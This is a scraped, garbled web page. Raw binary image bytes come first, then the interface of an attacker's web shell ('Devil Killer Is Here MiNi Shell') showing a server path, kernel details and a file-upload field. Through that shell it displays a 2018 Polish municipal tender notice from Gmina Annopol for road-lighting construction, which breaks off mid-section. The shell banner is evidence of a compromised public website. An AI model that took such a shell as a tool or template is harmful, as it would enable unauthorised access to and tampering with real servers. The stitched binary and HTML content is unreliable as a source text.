JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180322/535037-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 535037-N-2018 z dnia 2018-03-22 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Annopol</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Budowa oświetlenia drogowego na terenie gminy Annopol</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Annopol</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">83040962000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">23235 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Annopol</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubelskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">158 613 063</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">wszymczyk@interia.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">158 613 061</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.annopol.info</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://umannopol.bip.lubelskie.pl/index.php?id=6</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Annopolu, ul. Rynek 1, 23-235 Annopol, pokój nr 2 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Budowa oświetlenia drogowego na terenie gminy Annopol</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.1.2.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zad. 1 Budowa oświetlenia w m. Janiszów (transformator nr 5).Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Janiszów gmina Annopol - oświetlenie drogi powiatowej nr 2710 zasilane ze stacji transformatorowej ,,Janiszów 5"":o	budowa złącza słupowego ZS zgodnie z rys. Nr E-04 dokumentacji projektowej wraz z zasilaniem złącza,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanego złącza ZS na słupie nr 9/V do projektowanego słupa oświetleniowego 9/1/WO długości 31,0/61,0 m, o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodem izolowanym typu AsXSn 2x35 mm2, zawieszonym na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED. Długość projektowanej linii napowietrznej wynosi 262/275 m - obwód nr 1 i 307/325 m - obwód nr 2 (razem 569/600 m), na 14 słupach,o	uziemienie robocze i odgromowe słupów nr 9/1/WO, 9/7/WO, 9/14/WO,o	ochrona przeciwprzepięciowa - ograniczniki przepięć 5 szt. wg projektu.Zad. 2 Budowa oświetlenia w m. Kopiec.Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego i podwieszonego w miejscowości Kopiec gmina Annopol - oświetlenie odcinka drogi gminnej na działkach o nr ewidencyjnych 74 - obręb Kopiec i 950 - obręb Świeciechów Poduchowny":o	dostosowanie członu oświetleniowego rozdzielnicy stacyjnej nN ,,Świeciechów 1" do wyprowadzenia obwodu oświetlenia drogowego poprzez wymianę wkładki topikowej przedlicznikowej na wkładkę WT-00/gF 25A oraz dobudowę wyłącznika nadprądowego S301 C16 A do zabezpieczenia zalicznikowego projektowanego obwodu oświetleniowego,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, w tym:a)	oświetlenie podwieszone na odcinkach: od istniejącej słupowej stacji transformatorowej ,,Świeciechów 1" do istniejącego słupa nr 2 oraz od istniejącego słupa nr 9 do istniejącego słupa nr 11/1 z montażem opraw oświetlenia drogowego LED na istniejących słupach nr 1, 9, 10, 11, 11/1. Długość projektowanego przewodu podwieszonego AsXSn 2x35 mm2 wynosi 166/183 m,b)	oświetlenie wydzielone na odcinku od istniejącego słupa nr 2 do istniejącego słupa nr 9 w tym montaż słupów z żerdzi wirowanych od nr 1/A/WO do nr 6/A/WO (6 szt.), montaż opraw oświetlenia drogowego LED na projektowanych słupach nr 1/A/WO, 3/A/WO, 4/A/WO, 5/A/WO, 6/A/WO. Długość projektowanego przewodu wydzielonego AsXSn 2x35 mm2 wynosi 241/255 m,o	ochrona przeciwprzepięciowa - montaż ochronnika przepięć na przewodzie fazowym przewodu oświetleniowego na słupie nr 11/1 z wykorzystaniem istniejącego uziomu.Zad. Nr 3 Budowa oświetlenia w m. Opoka (od P. Siewierskiego do P. Szymuli).Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Opoka Kolonia, obręb: 0016 Opoka, gmina Annopol - oświetlenie drogi gminnej - dz. nr ewidencyjny 1969":o	budowa szafki oświetleniowej ,,SO" z układem pomiarowo - rozliczeniowym zgodnie z rys. Nr E-03 projektu budowlano - wykonawczego,o	budowa przyłącza kablowego YAKXS 4x35 mm2 z szafką słupowo - przyłączeniową SSP-3 na słupie nr 11/4, relacji od istniejącego słupa nr 11/4 do projektowanej szafki oświetleniowej SO długości 4,0/13,0 m. Zasilanie szafki SSP-3 od istniejących przewodów gołych linii nN 4xAL 25 mm2 kablem YAKXS 4x70 mm2 ułożonym na słupie,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanej szafki oświetleniowej ,,SO" do projektowanego słupa nr 1/A/WO długości 16,0/32,0 m, o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, zawieszonymi na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED (9 szt.). Długość projektowanej linii napowietrznej wynosi 344/361 m na 10 słupach,o	uziemienie robocze szafki oświetleniowej SO,o	uziemienie robocze i odgromowe słupów nr 11/4/IV, 1/A/WO, 10/A/WO,o	ochrona przeciwprzepięciowa poprzez montaż ograniczników przepięć na przewodach linii napowietrznej oświetleniowej wg projektu.Zad. Nr 4 Budowa oświetlenia w m. Opoka (od P. E. Juda do P. H. Juda).Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego wydzielonego w miejscowości Opoka Kolonia gmina Annopol - oświetlenie odcinka drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce w około od km 2+684 do ok. km 2+847 (działka o numerze ewidencyjnym 630, obręb 0016 Opoka)":o	demontaż istniejącej oprawy oświetleniowej OUS-150 z istniejącego słupa nr 32,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodem izolowanym typu AsXSn 2x35 mm2, zawieszonym na projektowanych słupach z żerdzi wirowanych typu E, na których zamontowane zostaną na wysięgnikach rurowych oprawy oświetleniowe na źródła światła LED. Długość projektowanej linii napowietrznej wynosi 171/182 m na 5 projektowanych słupach zasilanej z istniejącego słupa nr 32,o	uziemienie robocze i odgromowe słupa o projektowanym nr 5/A/WO,o	ochronę przeciwprzepięciową poprzez montaż ograniczników przepięć wg projektu.Zad. Nr 5 Budowa oświetlenia w m. Kosin (droga woj. Nr 755 Zawichost - Kosin).Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego podwieszonego w miejscowości Kosin gmina Annopol - oświetlenie odcinka drogi wojewódzkiej nr 755 Zawichost - Kosin w km od 3+529 do 3+813 - dz. nr ewidencyjny 1816":o	budowa 1-fazowej, podwieszonej linii napowietrznej - oświetleniowej nN przewodem izolowanym typu AsXSn 2x35 mm2. Długość odcinka linii napowietrznej podwieszonej - 237/254 m,o	budowę linii kablowej oświetleniowej kablem ziemnym typu YAKXS 4x35 mm2 długości 49/74 m w tym przewiert poziomy długości 10 m,o	montaż opraw oświetlenia drogowego wraz z wysięgnikami - 6 szt,o	wymiana istniejącego słupa typu P-10/ŻN nr 16/IV na słupa z żerdzi wirowanej typu P3-12/4,3 - 1 szt,o	montaż ochronników przepięć na słupach nr 10/IV, 13/IV, 16/IV - 3 szt.Zad. Nr 6 Budowa oświetlenia w m. Borów (Górki).Wg projektu pod nazwą: ,,Budowa oświetlenia drogowego podwieszonego i wydzielonego w miejscowości Borów gmina Annopol - oświetlenie drogi gminnej- dz. nr ewidencyjny 4116":o	budowa szafki oświetleniowej z układem pomiarowo - rozliczeniowym zgodnie z rys. Nr E-03 projektu budowlano - wykonawczego,o	budowa przyłącza kablowego YAKXS 4x35 mm2 z szafką słupowo - przyłączeniową SSP-3 na słupie, od istniejącego słupa nr 6/II do projektowanej szafki oświetleniowej SO długości 6,0/17,0 m. Zasilanie szafki SSP-3 od istniejących przewodów AsXSn 4x70 mm2 kablem YAKXS 4x70 mm2 ułożonym na słupie,o	budowa linii kablowej zalicznikowej, zasilającej projektowane oświetlenie drogowe kablem YAKXS 4x35 mm2 od projektowanej szafki oświetleniowej ,,SO" do istniejącego słupa nr 6/II długości 6,0/22,0 m,o	budowa 1-fazowej, podwieszonej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2, zawieszonymi na istniejących słupach - odcinek od istniejącego słupa nr 6/II do istniejącego słupa nr 12/II. Długość odcinka linii napowietrznej podwieszonej wynosi 268/280 m,o	budowa 1-fazowej linii napowietrznej oświetleniowej nN z przewodami izolowanymi typu AsXSn 2x35 mm2 - oświetlenie wydzielone - od istniejącego słupa nr 12/II do projektowanego słupa nr 12/1/II/WO. Długość odcinka linii napowietrznej oświetlenia wydzielonego wynosi 55/59 m,o	montaż opraw oświetlenia drogowego wraz z podłączeniem do przewodów oświetleniowych na słupach od nr 6/II do 12/1/II/WO - 8 szt. Oprawy sodowe ze źródłami światła - lampy sodowe o mocy 150W,o	uziemienie robocze szafki oświetleniowej SO,o	uziemienie robocze i odgromowe słupa nr 12/1/II/WO,o	ochrona przeciwprzepięciową poprzez montaż ograniczników przepięć wg projektu.Zakres robót zgodny z dokumentacją techniczną, specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót (załączone przedmiary robót należy traktować jako element dodatkowy, pomocny w obliczeniu ceny oferty) - załącznik nr 1 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45311100-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-07-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"> Zamawiający nie określa warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"> Zamawiający nie określa warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna 